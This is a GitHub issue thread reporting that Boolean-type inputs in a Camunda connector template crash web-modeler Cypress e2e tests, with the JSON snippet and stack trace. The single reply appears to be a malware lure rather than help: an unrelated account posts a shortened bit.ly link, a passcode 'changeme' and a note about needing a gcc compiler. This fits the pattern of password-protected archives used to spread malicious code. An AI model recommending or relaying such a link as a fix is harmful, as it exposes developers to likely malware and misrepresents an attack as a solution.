### ISSUE TITLE
Boolean type input elements break web-modeler e2e tests

### ISSUE THREAD

**Issue by DenovVasil** [camunda/connectors#3233]
__Describe the Bug__

Json template that contains Boolean input break e2e.
example :

```json
{
      "id" : "input.analyzeTables",
      "label" : "Analyze tables",
      "optional" : false,
      "value" : true,
      "constraints" : {
        "notEmpty" : true
      },
      "feel" : "optional",
      "group" : "input",
      "binding" : {
        "name" : "input.analyzeTables",
        "type" : "zeebe:input"
      },
      "type" : "Boolean"
}
```

__Steps to Reproduce__

Run e2e tests on any PR that contains 

__Expected Behavior__

<details>
  <summary>Click to expand</summary>
```
TypeError: The following error originated from your application code, not from Cypress. It was caused by an unhandled promise rejection.
  > mapping.source.substring is not a function
When Cypress detects uncaught errors originating from your application it will automatically fail the current test.
This behavior is configurable, and you can choose to turn this off by listening to the `uncaught:exception` event.
https://on.cypress.io/uncaught-exception-from-application
    at getExpressionDetails (webpack-internal:///./node_modules/@bpmn-io/variable-resolver/lib/zeebe/util/feelUtility.js:194:37)
    at eval (webpack-internal:///./node_modules/@bpmn-io/variable-resolver/lib/zeebe/util/feelUtility.js:28:33)
    at Array.forEach (<anonymous>)
    at eval (webpack-internal:///./node_modules/@bpmn-io/variable-resolver/lib/zeebe/util/feelUtility.js:27:21)
    at Array.forEach (<anonymous>)
    at parseIoMappings (webpack-internal:///./node_modules/@bpmn-io/variable-resolver/lib/zeebe/util/feelUtility.js:26:13)
    at _resolveIoMappings (webpack-internal:///./node_modules/@bpmn-io/variable-resolver/lib/zeebe/VariableResolver.js:117:94)
    at invokeFunction (webpack-internal:///./node_modules/diagram-js/lib/core/EventBus.js:613:13)
    at EventBus._invokeListener (webpack-internal:///./node_modules/diagram-js/lib/core/EventBus.js:456:19)
    at EventBus._invokeListeners (webpack-internal:///./node_modules/diagram-js/lib/core/EventBus.js:430:24)
```

</details>

__Environment__

- OS: [e.g. Windows 7]
- Library version: [e.g. 2.0.0]
- Camunda version: [e.g. 8.0.4 (self-managed)]

**Comment by danilobalderramas** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler
